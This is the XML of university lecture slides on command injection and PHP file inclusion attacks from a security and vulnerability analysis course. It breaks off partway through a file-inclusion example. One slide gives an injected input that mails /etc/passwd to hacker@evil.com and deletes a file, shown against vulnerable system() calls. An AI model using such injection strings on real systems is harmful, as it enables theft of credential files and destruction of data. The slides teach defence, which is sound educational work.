            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144138001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emf"/><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Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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r-FR" dirty="0" smtClean="0"/>
              <a:t>Adam Doupé, Security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 186"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8242300" y="6356353"/>
            <a:ext cx="444500" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988045441"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484548" r:id="rId1"/>
    <p:sldLayoutId id="2147484549" r:id="rId2"/>
    <p:sldLayoutId id="2147484550" r:id="rId3"/>
    <p:sldLayoutId id="2147484551" r:id="rId4"/>
    <p:sldLayoutId id="2147484552" r:id="rId5"/>
    <p:sldLayoutId id="2147484553" r:id="rId6"/>
    <p:sldLayoutId id="2147484554" r:id="rId7"/>
    <p:sldLayoutId id="2147484555" r:id="rId8"/>
    <p:sldLayoutId id="2147484556" r:id="rId9"/>
    <p:sldLayoutId id="2147484557" r:id="rId10"/>
    <p:sldLayoutId id="2147484558" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf sldNum="0"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6.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7.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.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ha.ckers.org/xss.html" TargetMode="Externa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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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noProof="1" smtClean="0"/>
              <a:t>Command Injection Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886199"/>
            <a:ext cx="6400800" cy="2059281"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>CSE 591 – Security and Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Spring 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Adam Doupé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="1" smtClean="0"/>
              <a:t>Arizona State University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>http://adamdoupe.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81389686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42" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS Command Injection Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: CGI program executes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command over a server file using the user input as parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hacker@evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt; /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  one can obtain the password file and delete the text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> \"$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hacker@evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt; /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>one can steal the password file and delete the text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "e", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$exp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case the execution is similar to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and therefore more secure (no shell parsing involved)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55324144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3184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3184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3184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3184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3184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3184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3184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Preventing OS Command Injection</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Command injection is a sanitization problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never trust outside input when composing a command string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many languages provide built-in sanitization routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>): adds single quotes around a string and quotes/escapes any existing single quotes allowing one to pass a string directly to a shell function and having it be treated as a single safe argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>escapeshellcmd($str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>): escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands (#&amp;;`|*?~&lt;&gt;^()[]{}$\, \x0A and \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. ' and " are escaped only if they are not paired)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336029172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File Inclusion Attacks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Many web frameworks and languages allow  the developer to modularize his/her code by providing a module inclusion mechanism (similar to the #include directive in C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If not configured correctly this can be used to inject attack code into the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload code that is then included</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provide a remote code component (if the language supports remote inclusion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Influence the path used to locate the code component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169538161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File Inclusion in PHP</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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> directive allows URLs to be used when including files with include() and require()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If user input is used to create the name of the file to be open then a remote attacker can execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>mainapp.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>=‘/includes/’; // this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> will be visible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>                           //in the included file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>include($includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> . ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>library.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
